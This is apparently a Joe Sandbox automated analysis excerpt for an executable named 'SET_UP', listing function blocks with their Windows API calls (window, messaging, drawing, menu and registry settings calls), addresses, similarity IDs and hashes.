• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: MessagePropSend$Remove
• String ID:
• API String ID: 2793251306-0
• Opcode ID: c98d151dd389b8e4af454005f2ef070a7b048c9cf3beb642a7ca649caffff8fc
• Instruction ID: 475ec370502cebf516315e9520fa181844cf79cd018bf4ee4497b68d130d37eb
• Opcode Fuzzy Hash: c98d151dd389b8e4af454005f2ef070a7b048c9cf3beb642a7ca649caffff8fc
• Instruction Fuzzy Hash: A6117BA95013107AF6009B15EC45FBB739CEB95765F004429FD1592241E3786D0A8BBB
APIs
  • Part of subcall function 004811D0: lstrlenA.KERNEL32(?), ref: 004811F6
• lstrlenA.KERNEL32(?,FFFFFFFF,(:D,?,00000000,00000000,00000080,00000000,?,FFFFFFFF), ref: 004813EC
Strings
Similarity
• API ID: lstrlen
• String ID: (:D$E$X
• API String ID: 1659193697-2767535589
• Opcode ID: 963e50ad427fd3677b3fc9ba653bab18dd1b5f5e0bd2af760be697e6eb825f36
• Instruction ID: 0ac33c97d1d75ecbe0364a5059c8a07b551a5a3da9f1de8ea84b126ad474a7e7
• Opcode Fuzzy Hash: 963e50ad427fd3677b3fc9ba653bab18dd1b5f5e0bd2af760be697e6eb825f36
• Instruction Fuzzy Hash: 8E1108614083846BE301EA55AC40E7FBBACDBD2B08F44491FFD4812213D7599E0E83B3
APIs
• GetMessageW.USER32(?,?,?,?), ref: 0041C476
• TranslateMessage.USER32(?), ref: 0041C483
• DispatchMessageW.USER32(?), ref: 0041C48D
• GetMessageW.USER32(?,?,?,?), ref: 0041C4BA
Similarity
• API ID: Message$DispatchTranslate
• String ID:
• API String ID: 1706434739-0
• Opcode ID: 44ee93da1e2eee9d3780ea833ba164dfed4cf03be1e301763fd4eb9442b8f3f2
• Instruction ID: 7ec16b723d3bcfda4191fa07cc38053b2163a35b35edffb2336d47764a4d6d1d
• Opcode Fuzzy Hash: 44ee93da1e2eee9d3780ea833ba164dfed4cf03be1e301763fd4eb9442b8f3f2
• Instruction Fuzzy Hash: FC11123294421BA7DF209EE1DCD4EFF7B7CAB41744F144427E90492150E238D9458BA9
APIs
• SendMessageW.USER32(?,00001036,00000000,00000420), ref: 004392A0
• GetClientRect.USER32(?,?), ref: 004392AD
  • Part of subcall function 004B00CE: SendMessageW.USER32(?,00001061,?,00000005), ref: 004B0117
• GetSystemMetrics.USER32(00000002), ref: 004392D3
• PathFindFileNameW.SHLWAPI(?,00000001,00508FBC,00000000,?), ref: 004392F5
  • Part of subcall function 004B5698: SetWindowTextW.USER32(?,?), ref: 004B56A6
  • Part of subcall function 00439315: __EH_prolog.LIBCMT ref: 0043931A
  • Part of subcall function 00439315: SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00439339
  • Part of subcall function 00439315: PathFindFileNameW.SHLWAPI(?,00000001,00000000,File Name,00000000,00000000,00000000,00000000,00000410,?,?,00508FBC), ref: 00439375
Similarity
• API ID: MessageSend$FileFindNamePath$ClientH_prologMetricsRectSystemTextWindow
• String ID:
• API String ID: 2817607957-0
• Opcode ID: bd10ec16099347bc078ac663bc15d6b26c0e3202bf92b468939cab205ef67100
• Instruction ID: 28c8ef04bfa2c3790541f33992d10680e51783e0dcfa2e42b9bd0ba44d13de14
• Opcode Fuzzy Hash: bd10ec16099347bc078ac663bc15d6b26c0e3202bf92b468939cab205ef67100
• Instruction Fuzzy Hash: E801F5313003047FE624BB29DC06FBEB759EB84718F50062DF652662D1CFA628148769
APIs
• __EH_prolog.LIBCMT ref: 0043128A
• GetSysColor.USER32(00000012), ref: 004312F9
• GetSysColor.USER32(00000012), ref: 00431300
• GetSysColor.USER32(00000012), ref: 00431307
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Color$H_prolog
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3000748305-0
                                                                                                                                                                                                  • Opcode ID: 18d19d943a79564bdc10385ecf78686cb974acb181aa2fd274c982cff516bc5d
                                                                                                                                                                                                  • Instruction ID: dd28277c65d90fd8287f1515e4ba46916afc24d2dceae50bb25c2e5c4b811928
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18d19d943a79564bdc10385ecf78686cb974acb181aa2fd274c982cff516bc5d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D1126B0901204DFCB54DF6AC881689FFE8FF55314B1082ABED189F296D3B59900CF90
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 004AC333
                                                                                                                                                                                                  • GetWindow.USER32(00000000,00000005), ref: 004AC34F
                                                                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 004AC365
                                                                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 004AC370
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2353593579-0
                                                                                                                                                                                                  • Opcode ID: d2ac013020d1d9304cd6380cc213eb497f8117324320f08473f8196bb58f6e36
                                                                                                                                                                                                  • Instruction ID: 4da0970acc80ee04cfaec52dab00f28062ebbd4a4fd2b12074e09b71a6de90f9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2ac013020d1d9304cd6380cc213eb497f8117324320f08473f8196bb58f6e36
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9F0F46734430526C66162AA2CC6F6F7B9C8BF3F51F00403AFA00A6282FE55C805433D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 004AC435
                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 004AC442
                                                                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 004AC45F
                                                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 004AC46D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ColorWindow$LongText
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3945788684-0
                                                                                                                                                                                                  • Opcode ID: 79935f47699c6dc4f4f775fa1cdbbccae6f8e20c686b989f918f2e35ce913579
                                                                                                                                                                                                  • Instruction ID: 5244a2c9001e7e4c245fc531c17326d3ff312077aa8997fc67d10e0a0b47ae78
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79935f47699c6dc4f4f775fa1cdbbccae6f8e20c686b989f918f2e35ce913579
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C80147362092109BCBA1C764FCC8DEF7B59EBBB321B144A2BF441C3190C3199946C3AE
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000410,00000000,?), ref: 0041080B
                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00410826
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000001,00000000), ref: 00410847
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000407,00000000,?), ref: 00410856
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$ClientScreen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1264711397-0
                                                                                                                                                                                                  • Opcode ID: c0aad7cc3490d21c89511c8868476b49e739af076476050d094219184b09c950
                                                                                                                                                                                                  • Instruction ID: 080bd0b3a7eacc56cb11cc84757ab4e9ee2acc611f1661a7f23b0752989cab4e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0aad7cc3490d21c89511c8868476b49e739af076476050d094219184b09c950
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 631130B1E00218AFDB04CF95DC45DEF7BB8EB48700F104066EA01B7291D2B1EE51CBA4
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WindowFromPoint.USER32(?,?), ref: 004B073D
                                                                                                                                                                                                  • GetParent.USER32(00000000), ref: 004B074A
                                                                                                                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 004B076B
                                                                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 004B0784
                                                                                                                                                                                                    • Part of subcall function 004BB9C5: GetWindowLongW.USER32(00000000,000000F0), ref: 004BB9D6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$ClientEnabledFromLongParentPointScreen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2204725058-0
                                                                                                                                                                                                  • Opcode ID: 54d1a6ddf4956bd32fbe47b586b0b91564bab1ab3381e5158ead58d4bf3eb79f
                                                                                                                                                                                                  • Instruction ID: 5e157fd796d75737bcbba2ba5999b7747e79b2c27fa5d807125c1bbba4034d36
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54d1a6ddf4956bd32fbe47b586b0b91564bab1ab3381e5158ead58d4bf3eb79f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A017176600610BF8712AB99DC44DEFBBA9EF99741B14812AF905D3311EF34DD029BA8
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 004B41C1
                                                                                                                                                                                                  • GetTopWindow.USER32(00000000), ref: 004B41D4
                                                                                                                                                                                                  • GetTopWindow.USER32(?), ref: 004B4204
                                                                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 004B421F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$Item
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 369458955-0
                                                                                                                                                                                                  • Opcode ID: 0a4af17f0be6f12160f056ecb829354f0bd791365ade4561452deee36b7fb693
                                                                                                                                                                                                  • Instruction ID: 71a5bbc8a4f74497482b7b7d86540caa3252a7fbe24a4218089211a0357540dd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a4af17f0be6f12160f056ecb829354f0bd791365ade4561452deee36b7fb693
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0401F232501219BBCF226F6A9C05EEF3AA9AFA43D1F044426FC0095212D739CA11A6BD
APIs
• GetTopWindow.USER32(?), ref: 004B423D
• SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004B4273
• GetTopWindow.USER32(00000000), ref: 004B4280
• GetWindow.USER32(00000000,00000002), ref: 004B429E
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Window$MessageSend
• String ID:
• API String ID: 1496643700-0
• Opcode ID: 581cc1de6b407bb5b9d4370379e9469a0c2862ac6050fc315e0ebc94ac30c8fe
• Instruction ID: d29bedf34d2489e70e21fc490da510614472d8a939f784bf7c9cb0505fb6746f
• Opcode Fuzzy Hash: 581cc1de6b407bb5b9d4370379e9469a0c2862ac6050fc315e0ebc94ac30c8fe
• Instruction Fuzzy Hash: E9012D36001219BBCF165F959D05EDF3B25AF94790F054066F90055121C73AC921FBB9
APIs
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Item$EnableFocusMenuNextParent
• String ID:
• API String ID: 988757621-0
• Opcode ID: 12a280d99a833a5a2257c4b66f0b9a833b33a37a5c52e796bd1740a3623ab554
• Instruction ID: 080c9486824799606951a15e29b0bbce037747d14595488f942b43dee01f332d
• Opcode Fuzzy Hash: 12a280d99a833a5a2257c4b66f0b9a833b33a37a5c52e796bd1740a3623ab554
• Instruction Fuzzy Hash: 80115271210B009FDB39AF21DC59F5ABBB5EF54714F104A2EF142465A1DB78F851CB28
APIs
• InvalidateRect.USER32(?,?,00000000,?,000000FF,?,?), ref: 00414261
• UpdateWindow.USER32(?), ref: 0041426A
• GetDC.USER32(?), ref: 00414276
  • Part of subcall function 004C0464: SetBkColor.GDI32(A5A5D47D,?), ref: 004C046E
  • Part of subcall function 004C0464: ExtTextOutW.GDI32(A5A5D47D,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004C0484
• ReleaseDC.USER32(?,?), ref: 0041429B
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ColorInvalidateRectReleaseTextUpdateWindow
• String ID:
• API String ID: 1832808473-0
• Opcode ID: c30f01917b760a084ffcff416a1e6129a6413b811ea61578b74a56eb06bf0f74
• Instruction ID: c34ca7a905355f2b639b16c5bd02e8bb050470ce209b5db82ad60d98df698c5b
• Opcode Fuzzy Hash: c30f01917b760a084ffcff416a1e6129a6413b811ea61578b74a56eb06bf0f74
• Instruction Fuzzy Hash: B4019231100205EFCF216F62DC08DEB7BB9FF81354B14896BF966911A0D7399891DB69
APIs
• RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004,00000001,?,?,0042AF28,Settings,LastLicenseCheck,?,?,?), ref: 004BC346
• RegCloseKey.ADVAPI32(00000000,?,0042AF28,Settings,LastLicenseCheck,?,?,?), ref: 004BC34F
• wsprintfW.USER32 ref: 004BC36B
• WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 004BC384
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ClosePrivateProfileStringValueWritewsprintf
• String ID:
• API String ID: 1902064621-0
• Opcode ID: 0896c1862b53e5e173d7cdb62790960d7ceef2101c21d26179361e9f8fbc7d53
• Instruction ID: 44b26edb8e51dc0be4dcf0307bbc0e8ad7f273087ff60c865606b12fe3e7a044
• Opcode Fuzzy Hash: 0896c1862b53e5e173d7cdb62790960d7ceef2101c21d26179361e9f8fbc7d53
• Instruction Fuzzy Hash: 00016232500214BBDB115FA5DC49FDA37A9BF08715F048526FE12A6160E779D5108BA8
APIs
• GetObjectW.GDI32(00000000,0000000C,?), ref: 004B4A75
• SetBkColor.GDI32(00000000,00000000), ref: 004B4A81
• GetSysColor.USER32(00000008), ref: 004B4A91
• SetTextColor.GDI32(00000000,?), ref: 004B4A9B
  • Part of subcall function 004BB9C5: GetWindowLongW.USER32(00000000,000000F0), ref: 004BB9D6
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Color$LongObjectTextWindow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2871169696-0
                                                                                                                                                                                                  • Opcode ID: f54d9d9919ec51ec6f03fa183f9438249fdebe1f1faddb27a61a8e666a0ba66c
                                                                                                                                                                                                  • Instruction ID: 40fd051d4876052a271469c35eeb0a2d16f05dce3502f33809585ac71f600045
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f54d9d9919ec51ec6f03fa183f9438249fdebe1f1faddb27a61a8e666a0ba66c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03014F31140105ABDF219F69DC49FEB3B65AB48750F144522F942C51E2D778C992CA7D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetActiveWindow.USER32(?), ref: 004C16C8
                                                                                                                                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 004C16E3
                                                                                                                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 004C1705
                                                                                                                                                                                                  • DragFinish.SHELL32(?), ref: 004C171E
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Drag$FileQuery$ActiveFinishWindow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 892977027-0
                                                                                                                                                                                                  • Opcode ID: a8d42b306c3d772316ff1157c96532ab61ea1a03eb1eb6276b26a22507ccb0c0
                                                                                                                                                                                                  • Instruction ID: c106cdc3879648c0d573561c976e84107bf0e7e657dca837769fd439845e6031
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8d42b306c3d772316ff1157c96532ab61ea1a03eb1eb6276b26a22507ccb0c0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA0186B5500118FFDF50AF65DC88D9E7B7CEF44358B20416AF11597061D774AE41CB64
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004BBF53
                                                                                                                                                                                                  • DestroyMenu.USER32(?,?,?,?,004B9B29), ref: 004BBF72
                                                                                                                                                                                                  • DestroyMenu.USER32(?,?,?,?,004B9B29), ref: 004BBF7C
                                                                                                                                                                                                  • DestroyMenu.USER32(?,?,?,?,004B9B29), ref: 004BBF86
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DestroyMenu$H_prolog
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 750541241-0
                                                                                                                                                                                                  • Opcode ID: fd8d211a2e3a8ebc6b0b2a6f453a28a6485bf5702da75d3085b2e3bd1aa6f591
                                                                                                                                                                                                  • Instruction ID: 99caa705a6239e53fdde02640b4d800ed17decb9fa16345519263bbf287a318d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd8d211a2e3a8ebc6b0b2a6f453a28a6485bf5702da75d3085b2e3bd1aa6f591
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95F04471B106049BCB24AB7ACD01AAAB7EDEF40714B00466FE411D3690DBB8E901CEA8
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CaptureKillTimer$Release
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1776425836-0
                                                                                                                                                                                                  • Opcode ID: 79c2c3b27fe8a6236bdcc52ead58f10df6d3314ecd3257bd9a8f90d4d868d9b2
                                                                                                                                                                                                  • Instruction ID: 6e73e1e30760d92423468ddd9b753e439b4c3916b1c7c44013f00dee74008877
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79c2c3b27fe8a6236bdcc52ead58f10df6d3314ecd3257bd9a8f90d4d868d9b2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4F09032300B519BD7312B71DD44FDFB3AAEF40715F00481AF246A6050CB7DA91187A8
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
